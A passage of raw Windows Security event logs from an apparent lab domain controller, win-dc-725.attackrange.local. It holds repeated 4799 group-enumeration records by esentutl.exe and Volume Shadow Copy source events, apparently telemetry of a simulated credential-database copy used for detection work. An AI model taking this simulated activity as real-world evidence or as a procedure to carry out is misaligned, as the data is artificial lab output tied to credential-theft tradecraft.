EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258040
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258039
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258038
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258037
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258036
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258035
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258034
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258033
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258032
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258031
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258030
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258029
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258028
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258027
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258026
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258025
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258024
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258023
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258022
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258021
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258020
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258019
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258018
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258017
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258016
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258015
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258014
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258013
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258012
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258011
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258010
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258009
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258008
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258007
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258006
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258005
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258004
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258003
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258002
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258001
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258000
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257999
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257998
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257997
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257996
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257995
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4905
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Audit Policy Change
OpCode=Info
RecordNumber=257994
Keywords=Audit Success
Message=An attempt was made to unregister a security event source.

Subject
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Process:
	Process ID:	0xf08
	Process Name:	C:\Windows\System32\VSSVC.exe

Event Source:
	Source Name:	VSSAudit
	Event Source ID:	0x569D12
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4904
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Audit Policy Change
OpCode=Info
RecordNumber=257993
Keywords=Audit Success
Message=An attempt was made to register a security event source.

Subject :
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Process:
	Process ID:	0xf08
	Process Name:	C:\Windows\System32\VSSVC.exe

Event Source:
	Source Name:	VSSAudit
	Event Source ID:	0x569D12
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257992
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
